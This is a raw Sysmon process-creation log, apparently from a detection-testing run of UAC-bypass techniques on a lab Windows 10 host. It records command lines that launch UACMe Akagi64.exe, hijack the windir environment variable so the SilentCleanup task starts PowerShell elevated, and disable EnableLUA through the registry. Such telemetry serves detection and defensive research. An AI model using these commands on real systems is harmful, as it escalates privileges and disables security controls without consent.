01:04:55.486{51A89197-C7B7-6552-3D03-000000001E00}2852C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\34 
Akagi64.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000679091Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:51.673{51A89197-C7B3-6552-3C03-000000001E00}7708C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7B3-6552-3B03-000000001E00}8044C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000679083Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:51.661{51A89197-C7B3-6552-3B03-000000001E00}8044C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe"C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C7B3-6552-3A03-000000001E00}184C:\Windows\System32\mmc.exe"C:\Windows\system32\mmc.exe" 
"C:\Windows\system32\eventvwr.msc"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000679036Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:51.556{51A89197-C7B3-6552-3A03-000000001E00}184C:\Windows\System32\mmc.exe10.0.17134.1 (WinBuild.160101.0800)Microsoft Management ConsoleMicrosoft® Windows® Operating SystemMicrosoft Corporationmmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc"C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=382008FBA9480F6568DB3E1F335D080192DE62CA,MD5=BA80301974CC8C4FB9F3F9DDB5905C30,SHA256=683C0CB518B3FE31CFFA7FCF79F5EFC18D355C6D52734757758ED26AE5950037,IMPHASH=A4839A4F4C2BB2C12AA47ACB52D27833{51A89197-C7B3-6552-3903-000000001E00}7484C:\Windows\System32\eventvwr.exe"C:\Windows\system32\eventvwr.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000679005Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:51.519{51A89197-C7B3-6552-3903-000000001E00}7484C:\Windows\System32\eventvwr.exe10.0.17134.1 (WinBuild.160101.0800)Event Viewer Snapin LauncherMicrosoft® Windows® Operating SystemMicrosoft Corporationeventvwr.exe"C:\Windows\system32\eventvwr.exe" C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=28BB161C17A1F502EFADE3F88273C8D489C8FD23,MD5=D9F31E9C7E898BC057FFEBD6D5A25979,SHA256=0EE8F607E5CCD6D0AB3296BBB37254C096CAC9EC464FD8AA75F0838C8F40276B,IMPHASH=5843AE9886BB500E05E07EE59BB5AD42{51A89197-C7B1-6552-2F03-000000001E00}1844C:\DetectionTesting\Temp\ExternalPayloads\uacme\33 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\33 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000678958Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:51.452{51A89197-C7B3-6552-3803-000000001E00}6092C:\Windows\System32\dllhost.exe10.0.17134.1 (WinBuild.160101.0800)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\system32\DllHost.exe 
/Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=257815EF5AC9E0408D327C5D1627D4C3795FF341,MD5=2528137C6745C4EADD87817A1909677E,SHA256=204FD3DA29E9197A7E82AB628E017A74082934E87092AFE18D253446608E0971,IMPHASH=68E651F131674892AE7E46556EB24726{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000678716Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:51.299{51A89197-C7B3-6552-3703-000000001E00}5956C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 318 0000025DF1F4CCA0C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000678706Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:51.278{51A89197-C7B3-6552-3603-000000001E00}7936C:\Windows\System32\eventvwr.exe10.0.17134.1 (WinBuild.160101.0800)Event Viewer Snapin LauncherMicrosoft® Windows® Operating SystemMicrosoft Corporationeventvwr.exe"C:\Windows\system32\eventvwr.exe" C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=28BB161C17A1F502EFADE3F88273C8D489C8FD23,MD5=D9F31E9C7E898BC057FFEBD6D5A25979,SHA256=0EE8F607E5CCD6D0AB3296BBB37254C096CAC9EC464FD8AA75F0838C8F40276B,IMPHASH=5843AE9886BB500E05E07EE59BB5AD42{51A89197-C7B1-6552-2F03-000000001E00}1844C:\DetectionTesting\Temp\ExternalPayloads\uacme\33 
Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\33 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000678583Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:51.087{51A89197-C7B3-6552-3503-000000001E00}7604C:\Program Files\Windows Media Player\osk.exe10.0.17134.376 (WinBuild.160101.0800)Accessibility On-Screen KeyboardMicrosoft® Windows® Operating SystemMicrosoft Corporationosk.exe"C:\Program Files\Windows Media Player\osk.exe" C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961HighSHA1=05039ED9DBFB513A18649D946FEA67EC1715DF58,MD5=FAF01C3C0E977AA81B925B1B81C8919B,SHA256=F855FFB4F49EFE66EFCDF28E0710637FE34E7A89E38A9493C88153220CD873AD,IMPHASH=701A7B99D329B6D4E6B9C4CB9292D8A5{51A89197-C7B1-6552-2F03-000000001E00}1844C:\DetectionTesting\Temp\ExternalPayloads\uacme\33 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\33 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000678341Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:50.916{51A89197-C7B2-6552-3403-000000001E00}5764C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 396 0000025DF47CF570C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000678308Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:50.877{51A89197-C7B2-6552-3303-000000001E00}6160C:\Program Files\Windows Media Player\osk.exe10.0.17134.376 
(WinBuild.160101.0800)Accessibility On-Screen KeyboardMicrosoft® Windows® Operating SystemMicrosoft Corporationosk.exe"C:\Program Files\Windows Media Player\osk.exe" C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=05039ED9DBFB513A18649D946FEA67EC1715DF58,MD5=FAF01C3C0E977AA81B925B1B81C8919B,SHA256=F855FFB4F49EFE66EFCDF28E0710637FE34E7A89E38A9493C88153220CD873AD,IMPHASH=701A7B99D329B6D4E6B9C4CB9292D8A5{51A89197-C7B1-6552-2F03-000000001E00}1844C:\DetectionTesting\Temp\ExternalPayloads\uacme\33 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\33 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000677969Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:50.465{51A89197-C7B2-6552-3203-000000001E00}5832C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 272 0000025DF3F06FC0C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000677637Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:49.891{51A89197-C7B1-6552-3103-000000001E00}4924C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 272 0000025DF3F076E0C:\Windows\system32\NT 
AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000677467Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:49.319{51A89197-C7B1-6552-2F03-000000001E00}1844C:\DetectionTesting\Temp\ExternalPayloads\uacme\33 Akagi64.exe3.2.7.2009UACMe main moduleUACMeHazardous EnvironmentsAkagi.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\33 Akagi64.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=1F0D1F86060682CEA6D5280220F949D625CB24CA,MD5=ADD1714CA3C62BC66B865C49410403BA,SHA256=36ECF63E1AC794B5FFC860EB5830EECED032F9345535776AEAA397F93D9CCADC,IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38{51A89197-C7B1-6552-2D03-000000001E00}5348C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\33 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000677435Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:49.252{51A89197-C7B1-6552-2E03-000000001E00}704C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7B1-6552-2D03-000000001E00}5348C:\Windows\System32\cmd.exe"cmd.exe" /c 
"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\33 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000677428Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:49.240{51A89197-C7B1-6552-2D03-000000001E00}5348C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\33 Akagi64.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000677300Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:48.598{51A89197-C7B0-6552-2B03-000000001E00}2724C:\Windows\System32\dllhost.exe10.0.17134.1 (WinBuild.160101.0800)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\system32\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=257815EF5AC9E0408D327C5D1627D4C3795FF341,MD5=2528137C6745C4EADD87817A1909677E,SHA256=204FD3DA29E9197A7E82AB628E017A74082934E87092AFE18D253446608E0971,IMPHASH=68E651F131674892AE7E46556EB24726{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000677244Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:48.539{51A89197-C7B0-6552-2A03-000000001E00}4468C:\Windows\System32\dllhost.exe10.0.17134.1 (WinBuild.160101.0800)COM 
C:C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000669172Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:15.179{51A89197-C78F-6552-F002-000000001E00}8124C:\Windows\System32\schtasks.exe10.0.17134.1 (WinBuild.160101.0800)Task Scheduler Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationschtasks.exeschtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=815A050FC4BD12C6CA0B62D38D0FB6F8A95F70A8,MD5=838D346D1D28F00783B7A6C6BD03A0DA,SHA256=8BE433049CCC271F04A8E625E9FB9BD3BCF15B4EDEB63497C00BD9CE1CD5C50E,IMPHASH=7EE4BC5589713B3470B8A950256E2E69{51A89197-C78D-6552-EB02-000000001E00}8164C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\T1548.002\src\T1548.002.bat"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000669108Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:13.257{51A89197-C78D-6552-EF02-000000001E00}3412C:\Windows\System32\timeout.exe10.0.17134.1 (WinBuild.160101.0800)timeout - pauses command processingMicrosoft® Windows® Operating SystemMicrosoft Corporationtimeout.exetimeout /t 2 C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=CB91BD898DC4B49B14ED7C843F61ADB4F3E38346,MD5=EB9A65078396FB5D4E3813BB9198CB18,SHA256=B7D686C4C92D1C0BBF1604B8C43684E227353293B3206A1220BAB77562504B3C,IMPHASH=0C91A5CE0FB26F4C5CE39E340F43873B{51A89197-C78D-6552-EB02-000000001E00}8164C:\Windows\System32\cmd.exe"cmd.exe" /c 
"C:\DetectionTesting\Temp\atomics\T1548.002\src\T1548.002.bat"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000669093Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:13.237{51A89197-C78D-6552-EE02-000000001E00}2756C:\Windows\System32\reg.exe10.0.17134.1 (WinBuild.160101.0800)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Environment" /v "windir" /d "cmd /c start powershell&REM " C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=04CE0B79EA20332CC4FF4679883B18BFE4341FBD,MD5=E3DACF0B31841FA02064B4457D44B357,SHA256=928693D84D652DC15B3FCDC6576D790053755C5181CE6708B1110DE12ADAE4A1,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC{51A89197-C78D-6552-EB02-000000001E00}8164C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\T1548.002\src\T1548.002.bat"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000668967Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:13.151{51A89197-C78D-6552-ED02-000000001E00}3564C:\Windows\System32\mode.com10.0.17134.1 (WinBuild.160101.0800)DOS Device MODE UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationMODE.COMmode 18,1C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=16D7150F57D44A09952BABE5ADD65942040164A7,MD5=1A3D2D975EB4A5AF22768F1E23C9A83C,SHA256=C3C078638B4C3BBE20EFDC3B5CE4B8471738D5AF572868A04A49C8335DB1B0B8,IMPHASH=2F60C2ED7648C832822B0B1EE9787340{51A89197-C78D-6552-EB02-000000001E00}8164C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\T1548.002\src\T1548.002.bat"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000668914Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:13.047{51A89197-C78D-6552-EC02-000000001E00}6172C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft 
CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C78D-6552-EB02-000000001E00}8164C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\T1548.002\src\T1548.002.bat"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000668907Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:13.040{51A89197-C78D-6552-EB02-000000001E00}8164C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\T1548.002\src\T1548.002.bat"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000668878Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:12.867{51A89197-C78C-6552-EA02-000000001E00}6632C:\Windows\System32\reg.exe10.0.17134.1 (WinBuild.160101.0800)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 
/fC:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=04CE0B79EA20332CC4FF4679883B18BFE4341FBD,MD5=E3DACF0B31841FA02064B4457D44B357,SHA256=928693D84D652DC15B3FCDC6576D790053755C5181CE6708B1110DE12ADAE4A1,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC{51A89197-C78C-6552-E802-000000001E00}4252C:\Windows\System32\cmd.exe"cmd.exe" /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /fATTACKBOX-WIN10\VICTIM 154100x8000000000000000668846Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:12.814{51A89197-C78C-6552-E902-000000001E00}7616C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C78C-6552-E802-000000001E00}4252C:\Windows\System32\cmd.exe"cmd.exe" /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /fATTACKBOX-WIN10\VICTIM 154100x8000000000000000668839Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:12.803{51A89197-C78C-6552-E802-000000001E00}4252C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 
/fC:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000668663Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:11.154{51A89197-C78B-6552-E702-000000001E00}6280C:\Windows\System32\notepad.exe10.0.17134.1 (WinBuild.160101.0800)NotepadMicrosoft® Windows® Operating SystemMicrosoft CorporationNOTEPAD.EXEnotepad.exeC:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=867B54F1BC5B71045A9A00BACA485A24176B202C,MD5=BB9A06B8F2DD9D24C77F389D7B2B58D2,SHA256=899346F9F283A4FD5AA03015A3F58CDE5B9C0B6A5C4D64C2CC74E9B22C1348D7,IMPHASH=A8F8224EB74E94301B59B88492740A75{51A89197-C78A-6552-E502-000000001E00}6624C:\Windows\System32\cmd.exe"cmd.exe" /c notepad.exeATTACKBOX-WIN10\VICTIM 154100x8000000000000000668275Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:10.792{51A89197-C78A-6552-E602-000000001E00}7012C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C78A-6552-E502-000000001E00}6624C:\Windows\System32\cmd.exe"cmd.exe" /c notepad.exeATTACKBOX-WIN10\VICTIM 
154100x8000000000000000668232Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:10.746{51A89197-C78A-6552-E502-000000001E00}6624C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c notepad.exeC:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C789-6552-E302-000000001E00}1292C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" /name Microsoft.BackupAndRestoreCenterATTACKBOX-WIN10\VICTIM 154100x8000000000000000667260Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 